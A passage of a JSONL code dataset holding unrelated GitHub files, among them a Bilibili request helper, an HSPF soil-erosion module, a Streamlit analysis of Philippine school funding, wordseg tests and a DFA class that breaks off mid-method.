plt.plot(matCUM_CF[k,:], 'g', label='klUCB-CF')\n plt.legend()\n","repo_name":"yonghanjung/CTF","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":18625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39693304035","text":"# -*- coding: utf-8 -*-\nimport aiohttp\n\n# 不带这堆头部有时候也能成功请求,但是带上后成功的概率更高\nBILIBILI_COMMON_HEADERS = {\n 'Origin': 'https://www.bilibili.com',\n 'Referer': 'https://www.bilibili.com/',\n 'Sec-CH-UA': '\"Google Chrome\";v=\"105\", \"Not)A;Brand\";v=\"8\", \"Chromium\";v=\"105\"',\n 'Sec-CH-UA-Mobile': '?0',\n 'Sec-CH-UA-Platform': '\"Windows\"',\n 'Sec-Fetch-Dest': 'empty',\n 'Sec-Fetch-Mode': 'cors',\n 'Sec-Fetch-Site': 'same-site',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)'\n ' Chrome/105.0.0.0 Safari/537.36'\n}\nBILIBILI_COMMON_COOKIES = {\n 'b_lsid': '639B17D4_9876590D28',\n '_uuid': '883B5256-A359-E4A3-7159-123456794937E96237infoc'\n}\n\nhttp_session = aiohttp.ClientSession(timeout=aiohttp.ClientTimeout(total=10))\n","repo_name":"shakenetwork/blivechat","sub_path":"utils/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"13504922091","text":"print('HSPF module imported')\n\n#-Detachment of soil particles by raindrop impact (ton/acre)\ndef DetachmentRaindrop(self, pcr, DELT60, CR, SMPF, KRER, RAIN, JRER):\n DET = DELT60 * pcr.max(0, (1 - CR - self.NoErosion_HSPF)) * SMPF * KRER * (RAIN / DELT60)**JRER\n return DET\n\n#-Detached sediment in storage (ton/acre)\ndef SedimentStorage(self, pcr, DETS, AFFIX, DET):\n DETS = DETS * (1 - AFFIX) + DET\n\n return DETS\n\n#-Detachment of soil particles by washoff (ton/acre)\ndef DetachmentWashoff(self, pcr, STCAP, DETS, SURO, SURS, CR):\n WSSD = pcr.ifthenelse(STCAP > DETS, DETS * SURO / (SURS + SURO), STCAP * SURO / (SURS + SURO)) * (1 - self.NoErosion_HSPF)\n\n return WSSD\n\n#-Detachment of soil particles from the soil matrix (ton/acre)\ndef DetachmentSoilScour(self, pcr, SURO, 
SURS, DELT60, KGER, JGER):\n SCRSD = SURO / (SURS + SURO) * DELT60 * KGER * ((SURS + SURO)/DELT60)**JGER * (1 - self.NoErosion_HSPF)\n\n #-set values in channels to 0 in case channels should be excluded\n if self.exclChannelsFLAG == 1:\n SCRSD = SCRSD * self.Hillslope\n\n return SCRSD\n\n#-Transport capacity (ton/acre)\ndef TransportCapacity(self, pcr, DELT60, KSER, SURO, SURS, JSER):\n STCAP = DELT60 * KSER * ((SURS + SURO)/DELT60)**JSER * (1 - self.NoErosion_HSPF)\n\n return STCAP\n\n#-K factor (-)\ndef K_HSPF(self, pcr):\n ksat_hourly = self.RootKsat / 24\n M_textural = (self.RootSiltMap * 100 + 0) * (100 - self.RootClayMap * 100)\n permeability = pcr.scalar(ksat_hourly > 150) * 1\n permeability = permeability + pcr.scalar(pcr.pcrand(ksat_hourly > 50, ksat_hourly < 150)) * 2\n permeability = permeability + pcr.scalar(pcr.pcrand(ksat_hourly > 15, ksat_hourly < 50)) * 3\n permeability = permeability + pcr.scalar(pcr.pcrand(ksat_hourly > 5, ksat_hourly < 15)) * 4\n permeability = permeability + pcr.scalar(pcr.pcrand(ksat_hourly > 1, ksat_hourly < 5)) * 5\n permeability = permeability + pcr.scalar(ksat_hourly < 1) * 6\n s = 2\n K_HSPF = ((2.1 * 10**-4 * M_textural**1.14 * (12 - self.RootOMMap) + 3.25 * (s - 2) + 2.5 * (permeability - 3))/100)\n return K_HSPF\n\n#-init processes hspf\ndef init(self, pcr, config):\n #-read table with HSPF landuse specific model parameters\n pcr.setglobaloption('matrixtable')\n hspf_table = self.inpath + config.get('HSPF', 'hspf_table')\n self.CR_HSPF = pcr.lookupscalar(hspf_table, 1, self.LandUse)\n try:\n self.KGER_HSPF = config.getfloat('HSPF', 'KGER')\n except:\n self.KGER_HSPF = pcr.lookupscalar(hspf_table, 2, self.LandUse)\n self.NoErosion_HSPF = pcr.lookupscalar(hspf_table, 3, self.LandUse)\n pcr.setglobaloption('columntable')\n\n #-read other model parameters\n self.JRER_HSPF = config.getfloat('HSPF', 'JRER')\n self.KSER_HSPF = config.getfloat('HSPF', 'KSER')\n self.JSER_HSPF = config.getfloat('HSPF', 'JSER')\n self.JGER_HSPF = config.getfloat('HSPF', 'JGER')\n self.AFFIX_HSPF = config.getfloat('HSPF', 'AFFIX')\n\n #-initial sediment storage\n self.DETS_HSPF = 0\n self.SURSold = 0\n \n #-define some constants\n self.acre_m2_HSPF = 4046.9\n self.inch_mm_HSPF = 25.4\n\n #-read P-factor values map or float\n try:\n self.P_HSPF = pcr.readmap(self.inpath + config.get('HSPF', 'P_USLE'))\n except:\n self.P_HSPF = config.getfloat('HSPF', 'P_USLE')\n\n #-when pedotransfer module is used, calculate the K-factor based on texture maps, else read K-factor values from the config file\n if self.PedotransferFLAG == 1:\n self.K_HSPF = self.hspf.K_HSPF(self, pcr)\n else:\n try:\n self.K_HSPF = pcr.readmap(self.inpath + config.get('HSPF', 'KRER'))\n except:\n self.K_HSPF = config.getfloat('HSPF', 'KRER')\n\n\n#-dynamic processes hspf\ndef dynamic(self, pcr, np, Precip, Runoff):\n #-determine daily precipitation in inch\n Precip_inch = Precip / self.inch_mm_HSPF\n\n #-get acre to m2 transformation value\n acre_m2_HSPF = self.acre_m2_HSPF\n\n #-determine detachment of soil particles by raindrop impact (ton/acre)\n DET = self.hspf.DetachmentRaindrop(self, pcr, 24, self.CR_HSPF, self.P_HSPF, self.K_HSPF, Precip_inch, self.JRER_HSPF)\n\n #-determine the sediment storage (ton/acre)\n self.DETS_HSPF = self.hspf.SedimentStorage(self, pcr, self.DETS_HSPF, self.AFFIX_HSPF, DET)\n\n #-determine the surface water storage\n SURS = 0\n\n #-determine the surface outflow (inch) (= routed runoff)\n SURO = pcr.max(0.0001, Runoff / self.inch_mm_HSPF)\n \n #-determine transport capacity 
(ton/acre)\n STCAP = self.hspf.TransportCapacity(self, pcr, 24, self.KSER_HSPF, SURO, SURS, self.JSER_HSPF)\n\n #-determine detachment of soil particles by washoff (ton/acre)\n WSSD = self.hspf.DetachmentWashoff(self, pcr, STCAP, self.DETS_HSPF, SURO, SURS, self.CR_HSPF)\n\n #-report detachment of soil particles by raindrop impact (ton / cell)\n self.reporting.reporting(self, pcr, 'DetRn', WSSD * (pcr.cellarea() / acre_m2_HSPF))\n\n #-update sediment storage\n self.DETS_HSPF = self.DETS_HSPF - WSSD\n\n #-determine detachment of soil particles from the soil matrix (ton/acre)\n SCRSD = self.hspf.DetachmentSoilScour(self, pcr, SURO, SURS, 24, self.KGER_HSPF, self.JGER_HSPF)\n\n #-report detachment of soil particles by runoff (ton / cell)\n self.reporting.reporting(self, pcr, 'DetRun', SCRSD * (pcr.cellarea() / acre_m2_HSPF))\n\n #-determine mass of sediment in transport (ton/acre)\n sed = WSSD + SCRSD\n\n #-report sediment in transport (ton / cell)\n self.reporting.reporting(self, pcr, 'SedTrans', sed * (pcr.cellarea() / acre_m2_HSPF))\n\n return sed\n","repo_name":"FutureWater/SPHY","sub_path":"modules/hspf.py","file_name":"hspf.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"19"} +{"seq_id":"15424772318","text":"import warnings\nimport geopandas as gpd\nimport descartes\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport streamlit as st\nfrom PIL import Image\nimport cluster\nst.set_page_config(page_title='Analyzing Gaps in the Philippine Education System', layout=\"wide\")\nwarnings.filterwarnings('ignore')\nst.set_option('deprecation.showPyplotGlobalUse', False)\n\nprov = pd.read_csv(\"schools_prov.csv\")\nregion = pd.read_csv(\"schools_region.csv\", index_col=\"school.region\")\nmerged_data = gpd.read_file('./merged_data/merged_data.shp')\ncorr = prov[['Schools_Income', 'Schools_Teachers', 'Schools_Rooms', 'Student_Teacher_Ratio', 'Schools_Enrollment']].corr()\n\n\ndef project():\n st.title('Analyzing Gaps in the Philippine Education System')\n st.subheader('by Data Science Fellowship Cohort 7 - Group 5')\n st.write('Adam, Adrian, Ben, Nilly (mentored by Aaron)')\n\n teacher_image = Image.open('teacher.jpg')\n\n col1, col2 = st.beta_columns(2)\n with col1:\n st.image(\n teacher_image,\n caption='A teacher with her class of 59 students in a Quezon City public school. Source: The Guardian'\n )\n with col2:\n st.markdown(\n \"In this **exploratory data analysis**, we aim to uncover the distribution of public education resources \"\n \"across the Philippines and identify critical deficiencies \"\n \"through an assessment of **Maintenance and Other Operating Expenses (MOOE)** \"\n \"allocation in the different regions.\"\n )\n\n\ndef background():\n st.title('Background')\n st.markdown(\n \"The United Nations SDG4 aims to *ensure inclusive and equitable quality education\\n\"\n \"and promote lifelong learning opportunities for all.*\")\n\n st.write(\n \"In the context of the Philippines, has this goal been properly translated into **reality**? \\n\"\n \"To investigate this, we asked three critical questions: \"\n )\n\n sdg4_image = Image.open('sdg4.jpg')\n \n col1, col2 = st.beta_columns([1, 2])\n with col1:\n st.markdown(\n \"1. **How are education resources distributed across the country?**\"\n )\n st.markdown( \n \"2. **Are there any schools, regions, or areas with resource deficiencies?**\"\n )\n st.markdown( \n \"3. 
**Are the perceived discrepancies in allocation justified for resource needs of these schools/regions?**\"\n )\n with col2:\n st.image(sdg4_image, caption='Source: Think Sustainability')\n \n\n\ndef what_is_mooe():\n st.title('What is MOOE?')\n st.write(\"\")\n col1, col2 = st.beta_columns(2)\n with col1:\n mooe_image = Image.open('what_is_mooe.png')\n st.image(mooe_image)\n with col2:\n mooe_computation = Image.open(\"mooe_computation.png\")\n st.image(mooe_computation)\n\ndef data_method():\n st.title('Data Sources and Methodology')\n st.write(\"\")\n col1, col2 = st.beta_columns(2)\n with col1:\n data_sources = Image.open(\"data_sources.png\")\n st.image(data_sources)\n with col2:\n methodology = Image.open(\"methodology.png\")\n st.image(methodology)\n\n\ndef methodology():\n st.title('Methodology')\n methodology = Image.open(\"methodology.png\")\n st.image(methodology)\n\n\ndef city_income():\n st.title('City Income vs School Resources')\n st.subheader(\"Schools in cities with higher incomes have more educational resources.\")\n st.write(\"\")\n \n col1, col2 = st.beta_columns(2)\n with col1:\n st.write(\"City income was found to be positively correlated with total number of enrollees, teachers and classrooms.\")\n fig = plt.figure(figsize=(10, 8))\n\n sns.set_theme(style=\"white\")\n sns.set_context(context=\"paper\",font_scale=1.7)\n mask = np.triu(np.ones_like(corr, dtype=bool))\n # cmap = sns.light_palette(\"blue\", as_cmap=True)\n sns.heatmap(corr, mask=mask, cmap=\"twilight\", center=1, annot=True)\n st.pyplot(fig)\n \n with col2:\n option = st.selectbox(\n 'City Income vs:',\n ['Teacher Availability', 'Room Availability', 'Enrollment', 'Student-Teacher Ratio'])\n \n if option == \"Teacher Availability\":\n fig = plt.figure(figsize=(8, 6))\n\n plt.scatter(prov[\"Schools_Income\"], prov[\"Schools_Teachers\"])\n plt.ylabel(\"Number of Teachers\")\n plt.xlabel(\"Income Level (PHP 1*10^11)\")\n st.pyplot(fig)\n st.write(\"Correlation coefficient: 0.86\")\n \n elif option == \"Room Availability\":\n fig = plt.figure(figsize=(8, 6))\n\n plt.scatter(prov[\"Schools_Income\"], prov[\"Schools_Rooms\"])\n plt.ylabel(\"Number of Rooms Available\")\n plt.xlabel(\"Income Level (PHP 1*10^11)\")\n st.pyplot(fig)\n st.write(\"Correlation coefficient: 0.88\")\n \n elif option == \"Enrollment\":\n fig = plt.figure(figsize=(8, 6))\n\n plt.scatter(prov[\"Schools_Income\"], prov[\"Schools_Enrollment\"])\n plt.ylabel(\"Enrolled Students\")\n plt.xlabel(\"Income Level (PHP 1*10^11)\")\n st.pyplot(fig)\n st.write(\"Correlation coefficient: 0.85\")\n \n elif option == \"Student-Teacher Ratio\":\n fig = plt.figure(figsize=(8, 6))\n\n plt.scatter(prov[\"Schools_Income\"], prov[\"Student_Teacher_Ratio\"])\n # plt.title(\"Provincial Income Level vs Mean Student-Teacher Ratio\", fontsize=14)\n plt.ylabel(\"Student-Teacher Ratio\")\n plt.xlabel(\"Income Level (PHP 1*10^11)\")\n st.pyplot(fig)\n st.write(\"Correlation coefficient: 0.42\")\n\n\ndef boncodin():\n st.title('Actual MOOE vs Boncodin MOOE')\n col1, col2 = st.beta_columns([1,2])\n with col1:\n st.subheader(\"At a Glance\")\n st.image(\"mooe_diff.png\", caption=None, width=None, use_column_width=None, clamp=False, channels='RGB',\n output_format='auto')\n st.write(\"**Some schools receive less than the Boncodin MOOE, some more.**\")\n option = st.selectbox(\n 'Select Visualization:',\n ['Bar chart', 'Heatmap'])\n \n \n with col2:\n st.subheader(\"MOOE Differentials by Region\")\n \n if option == \"Bar chart\":\n \n mpr = 
region[\"MOOE_Diff\"].sort_values()\n fig = plt.figure(figsize=(10, 6), dpi=200)\n plt.barh(mpr.index, mpr.values)\n # plt.title(\"Regional MOOE Differentials\", fontsize = 16)\n plt.xlabel(\"MOOE Differential\", fontsize=12)\n plt.xticks(range(0, 250000000, 25000000))\n st.pyplot(fig)\n \n elif option == \"Heatmap\":\n \n variable = 'MOOE_Diff'\n\n vmin, vmax = merged_data['MOOE_Diff'].min(), merged_data['MOOE_Diff'].max()\n fig, ax = plt.subplots(1, figsize=(8, 6), dpi=200)\n merged_data.plot(column=variable, cmap='PuBu', linewidth=0.8, ax=ax, edgecolor='0.8', vmin=vmin, vmax=vmax)\n sm = plt.cm.ScalarMappable(cmap='PuBu', norm=plt.Normalize(vmin=vmin, vmax=vmax))\n cbar = fig.colorbar(sm)\n st.pyplot()\n st.write(\"\")\n st.write(\"NCR, Region 3, 4-A, 6, 5, 7 have **higher** MOOE differentials.\")\n st.write(\"CAR, CARAGA, Region 4-B, 9, 2 have **lower** MOOE differentials.\")\n\ndef conclusion():\n st.title('Conclusion and Recommendations')\n st.write(\"## What did we learn?\")\n st.write(\"### How are education resources distributed across the country?\")\n st.write(\"- MOOE allocation generally favors schools in higher-income cities, highlighting inequitable distribution.\")\n st.write(\"### Are there any schools, regions, or areas with resource deficiencies?\")\n st.write(\"- 897 schools received less than the Boncodin MOOE.\")\n st.write(\"- Some regions require more rooms and teachers per student.\")\n st.write(\"### Are the perceived discrepancies justified for resource needs?\")\n st.write(\"- Not necessarily. Some regions have lower MOOE differentials but require more resources (CAR, Region 2).\")\n st.write(\"## What can we do?\")\n st.write(\n \"### We recommend a reevaluation of the Boncodin Formula, to incorporate certain factors important to the specific contexts of schools, such as:\")\n st.write(\"- Travel time and cost from school to Division Office)\")\n st.write(\"- Poverty incidence\")\n st.write(\"- Vulnerability to natural and human-induced hazards\")\n\ndef references():\n st.title('References')\n \n st.subheader('[1] Building Better Learning Environments in the Philippines')\n st.write(\"World Bank Group. (2016). Building Better Learning Environments in the Philippines. Philippines education note,no. 4;. World Bank, Washington, DC. © World Bank. https://openknowledge.worldbank.org/handle/10986/24744 License: CC BY 3.0 IGO.\")\n \n st.subheader(\"[2] House Bill No. 473: An Act Regulating Class Size in All Public Schools and Appointing Funds Therefor\")\n st.write(\"Tinio, A. L., & Castro, F. L. (2016, June 30). House Bill No. 473: An Act Regulating Class Size in All Public Schools and Appointing Funds Therefor. House Bill No. 473. https://www.congress.gov.ph/legisdocs/basic_17/HB00473.pdf.\")\n \n st.subheader(\"[3] Class-size affects students' learning : DepEd. Philippine News Agency RSS\")\n st.write(\"Montemayor, M. T. (2018, March 19). Class-size affects students' learning : DepEd. Philippine News Agency RSS. https://www.pna.gov.ph/articles/1029281. \")\n\n st.subheader('[4] Enhanced Basic Education Information System (EBEIS) (2015)')\n st.write(\"\") \n\n st.subheader('[5] Comparing the DISADVANTAGE INDEX (DI) with GEOGRAPHICALLY ISOLATED AND DISADVANTAGED AREAS (GIDA)')\n st.write(\"Comparing the DISADVANTAGE INDEX (DI) with GEOGRAPHICALLY ISOLATED AND DISADVANTAGED AREAS (GIDA). DepEd, 2015.\") \n \n st.subheader('[6] Computation of Public Schools MOOE')\n st.write(\"Llego, M. A. (2015). Computation of Public Schools MOOE. 
https://www.teacherph.com/computation-public-schools-mooe/\") \n \n \n \nlist_of_pages = [\n \"The Project\",\n \"Background\",\n \"What is MOOE?\",\n \"Data Sources and Methodology\",\n \"City Income vs School Resources\",\n \"Gaps in School Resources\",\n \"Actual vs Boncodin MOOE\",\n \"Clustering\",\n \"Conclusion and Recommendations\",\n \"References\"\n]\n\nst.sidebar.title('Table of Contents')\nselection = st.sidebar.radio(\"Go to\", list_of_pages)\n\nif selection == \"The Project\":\n project()\n\nelif selection == \"Background\":\n background()\n\nelif selection == \"What is MOOE?\":\n what_is_mooe()\n\nelif selection == \"Data Sources and Methodology\":\n data_method()\n\nelif selection == \"City Income vs School Resources\":\n city_income()\n\nelif selection == \"Gaps in School Resources\":\n cluster.gaps()\n\nelif selection == \"Actual vs Boncodin MOOE\":\n boncodin()\n\nelif selection == \"Clustering\":\n cluster.clustering()\n\nelif selection == \"Conclusion and Recommendations\":\n conclusion()\n \nelif selection == \"References\":\n references()\n","repo_name":"romeoben/DSC7-Sprint1-TeamAaron","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"49657478293","text":"# import colorgram\nimport turtle as turtle_module\nimport random\n# Used to extract colours from an image\n# rgb_colours = []\n# colours = colorgram.extract(\"day_18_hirst_painting/image.jpg\", 30)\n# for colour in colours:\n# r = colour.rgb.r\n# g = colour.rgb.g\n# b = colour.rgb.b\n# new_colour = (r,g,b)\n# rgb_colours.append(new_colour)\n# print(rgb_colours)\n\nscreen = turtle_module.Screen()\nscreen.title(\"Rainbow colours - Unknown Turtle (2022)\")\nturtle_module.colormode(255)\nstephen = turtle_module.Turtle()\nstephen.shape(\"turtle\")\nstephen.speed(\"fastest\")\ncolour_list =[(248, 231, 27), (202, 12, 30), (238, 244, 250), (35, 91, 186), (232, 229, 4), (232, 149, 48), (197, 68, 22), (212, 13, 9), (35, 31, 152), (49, 220, 60), (241, 46, 151), (20, 22, 53), (14, 208, 224), (75, 9, 53), (17, 154, 18), (55, 26, 13), (80, 193, 223), (219, 23, 116), (232, 159, 8), (241, 64, 24), (221, 138, 191), (96, 75, 10), (247, 11, 9), (83, 238, 162), (11, 96, 63), (5, 35, 33), (89, 208, 147)]\n\nstephen.penup()\nstephen.hideturtle()\nstephen.setheading(225)\nstephen.forward(300)\nstephen.setheading(0)\nnumber_of_dots = 100\nfor dot_count in range(1, number_of_dots + 1):\n stephen.dot(20, random.choice(colour_list))\n stephen.forward(50)\n if dot_count % 10 == 0:\n stephen.setheading(90)\n stephen.forward(50)\n stephen.setheading(180)\n stephen.forward(500)\n stephen.setheading(0)\n\nscreen.exitonclick()\n","repo_name":"stiamh/100_days_of_code","sub_path":"day_18_hirst_painting/day_18_hirst_painting.py","file_name":"day_18_hirst_painting.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39729048922","text":"# -*- coding: utf-8 -*-\nimport click\n\nfrom osmcha.changeset import Analyse\n\n\n@click.command('osmcha')\n@click.argument('id', type=int, metavar='changeset_id')\ndef cli(id):\n \"\"\"Analyse an OpenStreetMap changeset.\"\"\"\n ch = Analyse(id)\n ch.full_analysis()\n click.echo(\n 'Created: %s. Modified: %s. Deleted: %s' % (ch.create, ch.modify, ch.delete)\n )\n if ch.is_suspect:\n click.echo('The changeset {} is suspect! 
Reasons: {}'.format(\n id,\n ', '.join(ch.suspicion_reasons)\n ))\n else:\n click.echo('The changeset %s is not suspect!' % id)\n","repo_name":"willemarcel/osmcha","sub_path":"osmcha/scripts/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"19"} +{"seq_id":"17923801319","text":"from datetime import datetime\nfrom django.db.models import Q\n\ndef get_region_filter(region__initial):\n return (Q(events__region__initial=region__initial) | Q(events__city__region__initial=region__initial)) \n\ndef get_closed_events_filters(region__initial):\n today = datetime.today()\n if region__initial:\n HAS_BOTH_CORRECT_DATES = Q(get_region_filter(region__initial),events__from_date__lte=today,events__from_date__gte=today)\n HAS_UNDEFINED_ENDS_DATE = Q(get_region_filter(region__initial),events__from_date__lte=today,events__undefined_ends_date=True)\n else:\n HAS_BOTH_CORRECT_DATES = Q(events__from_date__lte=today,events__from_date__gte=today)\n HAS_UNDEFINED_ENDS_DATE = Q(events__from_date__lte=today,events__undefined_ends_date=True)\n return HAS_BOTH_CORRECT_DATES, HAS_UNDEFINED_ENDS_DATE","repo_name":"coronaaqui/services","sub_path":"cbrasil/cbrasil/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"21307124519","text":"from WMCore.Configuration import Configuration\nfrom CRABClient.UserUtilities import getUsernameFromSiteDB\n\nconfig = Configuration()\n\nconfig.section_(\"General\")\nconfig.General.requestName = rName\nconfig.General.workArea = dirName\nconfig.General.transferOutputs = True\nconfig.General.transferLogs = True\n\nconfig.section_(\"JobType\")\nconfig.JobType.pluginName = 'Analysis'\nconfig.JobType.psetName = 'miniAOD2TTree_cfg.py'\nconfig.JobType.pyCfgParams = ''\nconfig.JobType.outputFiles = ['miniaod2tree.root']\n\nconfig.section_(\"Data\")\nconfig.Data.inputDataset = dataset\nconfig.Data.inputDBS = 'global'\n#config.Data.inputDBS = 'phys03'\nconfig.Data.splitting = 'FileBased'\n#config.Data.totalUnits = 10\nconfig.Data.unitsPerJob = 5\nconfig.Data.publication = False\nconfig.Data.outLFNDirBase = '/store/user/%s/CRAB3_TransferData' % (getUsernameFromSiteDB())\n\nconfig.section_(\"Site\")\nconfig.Site.storageSite = 'T2_FI_HIP'\n\n","repo_name":"sorda/HiggsAnalysis","sub_path":"MiniAOD2TTree/test/crabConfig.py","file_name":"crabConfig.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19131872159","text":"import os\nimport pytest\n\nimport wordseg\nfrom wordseg import utils, Separator\nfrom wordseg.algos.dpseg import segment\nfrom . 
import prep\n\n\nargs = [\n '',\n '--ngram 1 --a1 0 --b1 1 --a2 0 -- b2 1',\n '--ngram 1 --a1 0.1 --b1 0.9 --do-mbdp 1',\n '--ngram 1 --a1 0 --b1 1 --forget-method P',\n '--ngram 1 --a1 0 --b1 1 --estimator V --mode batch',\n '--ngram 1 --a1 0 --b1 1 --estimator F',\n '--ngram 1 --a1 0 --b1 1 --estimator T',\n utils.strip('''\n --ngram 1 --a1 0 --b1 1 --estimator D --mode online --eval-maximize 1\n --eval-interval 50 --decay-rate 1.5 --samples-per-utt 20\n --hypersamp-ratio 0 --anneal-a 10 --burnin-iterations 1\n --anneal-iterations 0'''.replace('\\n', ' ')),\n]\n\n\n@pytest.mark.parametrize('nfolds, njobs', [(1, 1), (1, 4), (2, 2), (10, 1)])\ndef test_dpseg_parallel_folds(prep, nfolds, njobs):\n text = prep[:5]\n if nfolds > 5:\n with pytest.raises(ValueError):\n segment(text, nfolds=nfolds, njobs=njobs)\n else:\n assert len(list(segment(text, nfolds=nfolds, njobs=njobs))) == 5\n\n\n@pytest.mark.parametrize('args', args)\ndef test_dpseg_args(prep, args):\n segmented = segment(prep[:5], nfolds=1, args=args)\n assert len(list(segmented)) == 5\n\n\ndef test_config_files_are_here():\n confs = wordseg.algos.dpseg.get_dpseg_conf_files()\n assert len(confs) > 0\n for conf in confs:\n assert os.path.isfile(conf)\n assert conf[-5:] == '.conf'\n assert 'dpseg' in conf\n\n\n@pytest.mark.parametrize('conf', wordseg.algos.dpseg.get_dpseg_conf_files())\ndef test_dpseg_from_config_file(prep, conf):\n segmented = segment(prep[:5], nfolds=1, args='--config-file {}'.format(conf))\n assert len(list(segmented)) == 5\n","repo_name":"Rachine/wordseg","sub_path":"test/test_dpseg.py","file_name":"test_dpseg.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"24441087593","text":"#!/usr/bin/env python3\nimport sys, os, io\nfrom typing import Iterable, Tuple\nfrom graphviz import Source\nimport random\nimport itertools\nimport functools\n# from ltlf2dfa.parser.ltlf import LTLfParser\n# from .ltl import Formula\n\nimport typing\nfrom typing import *\n\nfrom typing import TypeVar, Hashable\nState = TypeVar('State', bound=Hashable)\nLetter = TypeVar('Letter', bound=Hashable)\n\n\nclass DFA(typing.Generic[State,Letter]):\n def __init__(self, *,\n init_state:'State',\n final_states:'Collection[State]',\n transitions:'Mapping[State,Mapping[Letter,State]]',\n ):\n self.final_states = self.accepting_states = final_states\n self.init_state = init_state\n self.init_states = [init_state]\n self.transitions = transitions\n self.states = list(transitions.keys())\n self.alphabet = list(transitions[init_state].keys())\n\n # Calculating number of words of length 0 accepted of length 0 from a state\n self.number_of_words = {(state, 0):int(state in self.final_states) for state in self.states}\n self.calculated_till = 0\n \n def translate(self, *,\n alphabet : 'Callable[[Letter],Letter] | Mapping[Letter, Letter] | Iterable[Letter]' = {},\n states : 'Callable[[State ],State ] | Mapping[State, State ] | Iterable[State ]' = {},\n ) -> 'DFA':\n \"\"\"Change the symbols and states of this automaton.\n Symbols and states can be collapsed to a single symbol.\n If a symbol is translated to `None`, the corresponding transitions are removed.\n \"\"\"\n\n if isinstance(alphabet, typing.Iterable) and not isinstance(alphabet, typing.Mapping):\n alphabet = {a:a2 for a,a2 in zip(self.alphabet,alphabet)}\n if isinstance(alphabet, typing.Callable):\n tr_a = functools.lru_cache(None)(alphabet)\n elif isinstance(alphabet, typing.Mapping):\n tr_a = lambda a: 
alphabet.get(a,a)\n else:\n raise TypeError(f\"alphabet: unexpected type {alphabet.__class__.__name__}\")\n \n if isinstance(states, typing.Iterable) and not isinstance(states, typing.Mapping):\n states = {s:s2 for s,s2 in zip(self.states,states)}\n if isinstance(states, typing.Callable):\n tr_s = functools.lru_cache(None)(states)\n elif isinstance(states, typing.Mapping):\n tr_s = lambda a: states.get(a,a)\n else:\n raise TypeError(f\"states: unexpected type {states.__class__.__name__}\")\n \n kwargs = dict()\n # kwargs['alphabet'] = alphabet2 = set(tr_a(a) for a in self.alphabet if tr_a(a) is not None)\n # kwargs['states'] = states2 = set(tr_s(s) for s in self.states)\n # kwargs['init_states'] = set(tr_s(s) for s in self.init_states)\n kwargs['final_states'] = set(tr_s(s) for s in self.final_states)\n kwargs['init_state'] = tr_s(self.init_state)\n kwargs['transitions'] = transitions2 = dict()\n for s,trans in self.transitions.items():\n trans2 = transitions2.setdefault(tr_s(s), dict())\n trans2.update((tr_a(a),tr_s(s2)) for a,s2 in trans.items() if tr_a(a) is not None)\n return __class__(**kwargs)\n \n @classmethod\n def product(cls, *dfas,\n synchronize:bool,\n alphabet : 'Callable[[Tuple[Letter]],Letter] | Mapping[Tuple[Letter], Letter] | Iterable[Letter]' = {},\n states : 'Callable[[Tuple[State ]],State ] | Mapping[Tuple[State], State ] | Iterable[State ]' = {},\n final : 'Callable[[Tuple[bool ]],bool ] | Mapping[Tuple[bool], bool ]' = all,\n ):\n if isinstance(final, typing.Callable):\n tr_f = functools.lru_cache(None)(final)\n elif isinstance(final, typing.Mapping):\n tr_f = lambda f: final.get(f,False)\n else:\n raise TypeError(f\"final: unexpected type {final.__class__.__name__}\")\n\n kwargs = dict()\n states2 = list(itertools.product(*(dfa.states for dfa in dfas)))\n kwargs['init_state'] = tuple(dfa.init_state for dfa in dfas)\n kwargs['final_states'] = set(\n s2\n for s2 in states2\n if tr_f(tuple(\n s in dfa.final_states\n for dfa,s in zip(dfas,s2)\n ))\n )\n kwargs['transitions'] = transitions2 = dict()\n for transitionss in itertools.product(*(dfa.transitions.items() for dfa in dfas)):\n ss, transs = zip(*transitionss)\n transitions2[ss] = {\n trs[0][0] if synchronize else\n tuple(tr[0] for tr in trs)\n : tuple(tr[1] for tr in trs)\n for trs in itertools.product(*(trans.items() for trans in transs))\n if not synchronize or len(set(tr[0] for tr in trs))==1\n }\n product = __class__(**kwargs)\n product = product.translate(alphabet=alphabet, states=states)\n return product\n \n def __invert__(self): return self.complement()\n\n def is_word_in(self, word):\n '''\n checks if a word belongs to the language of the DFA\n '''\n state = self.init_state\n for letter in word:\n state = self.transitions[state][letter]\n \n return state in self.final_states\n\n def complement(self):\n '''\n returns a complement of the self object\n '''\n comp_final_states = [state for state in self.states if state not in self.final_states]\n d = DFA(\n init_state=self.init_state,\n final_states=comp_final_states,\n transitions=dict(self.transitions),\n )\n return d\n\n def show(self, filename=\"test.gv\"):\n '''\n Produces an image of the DFA\n '''\n dot_str = \"digraph g {\\n\"\n\n dot_str += ('__start0 [label=\"start\" shape=\"none\"]\\n')\n\n for s in self.states:\n if s in self.final_states:\n shape = \"doublecircle\"\n else:\n shape = \"circle\"\n dot_str += ('{} [shape=\"{}\" label=\"{}\"]\\n'.format(s, shape, s))\n\n dot_str += ('__start0 -> {}\\n'.format(self.init_state))\n\n for s1 in 
